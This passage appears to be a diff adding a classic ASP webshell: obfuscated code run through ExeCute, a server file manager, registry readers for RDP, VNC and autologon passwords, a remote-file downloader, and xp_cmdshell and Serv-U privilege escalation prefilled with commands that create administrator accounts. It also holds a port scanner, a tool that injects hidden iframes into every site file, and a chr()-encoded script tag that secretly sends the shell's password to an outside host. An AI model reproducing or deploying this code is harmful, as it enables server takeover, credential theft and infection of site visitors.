+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function:Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):ExeCute SinfoEn("thPar(deoltFGeF.=CLDFOt Se)`i=0`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`erldfoub.sLDFOn  i FchEar Fos`'>&~orolrCdeor&B ~idol spx:1errdbo='lety siv<dr>teen=cgnli a7%=1thid w10t=ghei htd~<I&=SSI~`>~/a~<e&am.N&F>~br><ntfo</>06'='zesi' gsingdin'we=ac fntfo><~~����~~e=tlti' ~)~~)&meNaF.~&~\h&at(PthPaRe~&~~r(deolwFho:Sptriscvaja='efhra ~<I&=SSI `> /ay<op>C��''��e=tlti' am='ssla c)'k(soyen uret'rk=icclon)'~~erldFopyCo~~~,~~)&meNaF.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ></b[<b>><br~<I&=SSI~`>~/al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deollFDe~~~,~~)&\~~\~,~\e,am.N&F\~&~thPae(acplRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`a></veMo'>�ƶ�='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deoleFov~M,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI~`>~td</v>di</b></>]<ba></wnDo'>����='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~ilnFow~D,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 5od m iIf~`xtNe`>~leab/t><tr</d>/t><=2htighed <tr><tr>/t~<I&=SSI`=0:i~~I=:SSIS RR`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`esil.fldFon  i LchEar Fo` ~b></>[<b> /a~<e&am.N&L>~ntfo</>25'='zesi' gsingdin'we=ac fntfo><��''��e=tlti' );~~leFiwnDo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ><~'r&loCoerrdBo~&d lisox 1pr:deor'be=ylstv di><0''3t=ghei htd~<I&=SSI`> /at<di>E��''��e=tlti' am='ssla c)'~~leFiitEd~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~illFDe~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /ay<op>C��''��e=tlti' am='ssla c)'~~leFipyCo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~` ~ -b></>]<b> /ae<ov>M��''��e=tlti' am='ssla c)'~~leFiveMo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`>~<br><b~K)&2410e/iz.s(LngclI&=SSI` ~ -i> <b></&~peTyL.I&=SSI`>~td</v>di</i></&~edfidiMostLateDaL.I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 2od m iIf~`xtNe`e>blta</r>/t~<I& SRS R~`nghiot=NLDFOt Se",Pos):End function:Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:RRS ""&copyurl&""
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user super super /add & net localgroup administrators super /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&Serveru&chr(38)&chr(112)&chr(61)&Serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�����</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user userSea passSea /add & net localgroup administrators userSea /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·������:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
